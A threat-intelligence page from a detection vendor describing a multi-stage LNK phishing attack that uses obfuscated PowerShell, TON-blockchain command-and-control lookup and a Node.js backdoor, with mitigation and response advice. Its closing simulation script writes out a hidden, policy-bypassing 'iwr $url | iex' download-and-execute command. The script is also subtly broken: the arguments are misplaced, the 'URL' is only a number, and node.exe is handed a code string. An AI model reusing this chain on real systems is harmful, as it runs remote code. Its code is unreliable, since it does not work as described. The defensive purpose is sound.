SOC Prime Bias: High

14 Jul 2026 15:26 UTC

Multi-Stage LNK Attack Uses TON Blockchain to Deliver a Node.js Backdoor

Author Photo
SOC Prime Team linkedin icon Follow
Multi-Stage LNK Attack Uses TON Blockchain to Deliver a Node.js Backdoor
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

A sophisticated multi-stage attack uses malicious LNK files delivered through phishing to deploy a Node.js-based backdoor. The malware relies on the EtherHiding technique by querying the TON blockchain to obtain its command-and-control addresses, making infrastructure updates easier for the operators. It also uses advanced evasion methods, including a custom bytecode virtual machine interpreter and heavily obfuscated PowerShell scripts.

Investigation

The LevelBlue Managed Threat Research team discovered the campaign through security alerts tied to suspicious ZIP archives and LNK files. Analysts deobfuscated PowerShell commands that used bitwise and arithmetic logic to reconstruct malicious URLs. They also examined a custom JavaScript VM interpreter used to run encrypted bytecode and traced command-and-control retrieval to transactions on the TON blockchain.

Mitigation

Organizations should restrict execution of LNK files from untrusted sources and monitor for suspicious PowerShell behavior, especially commands involving bitwise logic or large integer calculations. Strong email filtering should be used to block malicious links, and defenders should watch for unauthorized Node.js installations or executions. Restricting access to blockchain-related APIs for unusual processes may also disrupt command-and-control retrieval.

Response

If this activity is detected, isolate affected endpoints and terminate suspicious node.exe or PowerShell processes immediately. Perform memory forensics to recover the decrypted JavaScript bytecode and identify the specific command-and-control domains being queried. Review registry Run keys for unauthorized persistence and scan for Windows Defender exclusions created by the malware.

Attack Flow

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre-flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.

  • Attack Narrative & Commands: The adversary aims to establish a backdoor on the system. To evade detection, they use an LNK file that executes a PowerShell command. Instead of a clear URL, they use -band 255 and -shr 8 to manipulate large integer values that, when processed, reconstruct a URL pointing to a malicious payload. Once the payload is fetched or staged, the PowerShell process spawns node.exe to execute the JavaScript-based backdoor, blending in with legitimate developer activity on the machine.

  • Regression Test Script:

    # Simulation of the Obfuscated PowerShell -> Node.js execution chain
    # This script mimics the specific command-line arguments required by the detection rule.
    
    $jsPayload = "console.log('C2 Connection Established');"
    
    # Step 1: Simulate the PowerShell obfuscation stage (as it would appear in the process command line)
    # In a real attack, this would be the command triggered by the LNK file.
    $simulatedPSCommand = "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -band 255 -shr 8 -Command `"`$url = [Convert]::ToString([bigint]123456789); iwr `$url | iex`""
    
    # Step 2: Simulate the subsequent Node.js execution as part of the same chain
    # We use Start-Process to simulate the parent-child relationship
    Start-Process "powershell.exe" -ArgumentList "-NoProfile -Command `"$simulatedPSCommand; node.exe $jsPayload`""
  • Cleanup Commands:

    # No persistent files were created by this simulation, 
    # but we ensure any spawned node processes are terminated.
    Stop-Process -Name "node" -ErrorAction SilentlyContinue
    Stop-Process -Name "powershell" -ErrorAction SilentlyContinue